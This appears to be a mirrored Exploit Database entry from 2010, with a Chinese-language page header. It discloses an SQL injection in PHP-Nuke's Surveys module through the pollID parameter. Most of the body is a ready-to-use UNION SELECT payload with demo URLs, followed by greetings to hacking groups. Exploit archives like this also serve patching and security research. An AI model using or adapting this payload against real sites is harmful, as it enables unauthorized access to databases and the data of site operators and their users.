PHP-Nuke CMS (Survey and Poll) – SQL Injection

• Exploit Database
• 123 阅读

• 作者： SENOT
  日期： 2010-03-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11627/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44

  ############################################################################################################# ## Tittle :PHPNUKE CMS ( Survey&poll ) SQLi Vulner ## ## Author : SENOT (selalungantuk_exe@yahoo.com)## ## Homepage : http://www.indonesiancoder.com ## ## Date : Thursday04 March, 2010 ## ## Location : - INDONESIA -## ############################################################################################################# [+] CMS INFO [+] Name : PHPNUKE CMS [+] Vendor : http://phpnuke.org/ [+] Download : http://phpnuke.org/modules.php?name=Downloads [+] Vulnerability : SQL [+] Dork : "Dork Just for newbie" #############################################################################################################   [ Vulnerable File ]   [+] http://127.0.0.1/[senot]/modules.php?name=Surveys&op=results&pollID=[INDONESIANCODER]     [ XpL ]   [+] +and+1=2+union+select+1,version(),3,4--     [ DEMO ]   [+] http://server/modules.php?name=Surveys&op=results&pollID=5+and+1=2+union+select+1,version%28%29,3,4--   [+] http://server/default.php?go=modules.php%3Fname%3DSurveys%26op%3Dresults%26pollID%3D132+and+1=2+union+select+1,version%28%29,3,4--   #############################################################################################################   [ Thx TO ]   [+] INDONESIAN CODER - ServerIsDown - IndonesianHacker - SoldierOfAllah [+] kaMtiEz,Tukulesto,M3NW5,arianom,gonzhack,tucker,saint [+] B4YU5154,nuxdtyals,qu1ck_51lv3r,Mr.J0k3R,brandal_666 [+] elv1n4,Mr.fribo,Jack,VycOd,x-shadow,bobyhikaru,deril0101 [+] ex girlfriend ( you Are my Spirit ) [+] And you   [+] Get the codes and Feel the Soul ( INDONESIANCODER TEAM )